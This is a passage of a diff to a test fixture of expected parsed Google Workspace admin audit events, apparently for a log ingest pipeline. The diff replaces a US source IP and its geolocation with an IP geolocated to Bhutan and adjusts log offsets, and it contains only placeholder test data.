-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1779,7 +1647,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1793,26 +1661,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 14377,
+        "log.offset": 14344,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1833,7 +1697,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -1845,26 +1709,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 14846,
+        "log.offset": 14812,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1885,7 +1745,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -1897,26 +1757,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 15239,
+        "log.offset": 15204,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1937,7 +1793,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1951,26 +1807,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 15623,
+        "log.offset": 15587,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1991,7 +1843,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2005,26 +1857,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 16083,
+        "log.offset": 16046,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2045,7 +1893,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2058,26 +1906,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 16545,
+        "log.offset": 16507,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2098,7 +1942,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2111,26 +1955,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 16960,
+        "log.offset": 16921,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2151,7 +1991,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2165,26 +2005,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 17391,
+        "log.offset": 17351,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2205,7 +2041,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2217,26 +2053,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 17852,
+        "log.offset": 17811,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2257,7 +2089,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2269,26 +2101,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 18233,
+        "log.offset": 18191,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2309,7 +2137,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2323,26 +2151,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 18617,
+        "log.offset": 18574,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2364,7 +2188,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
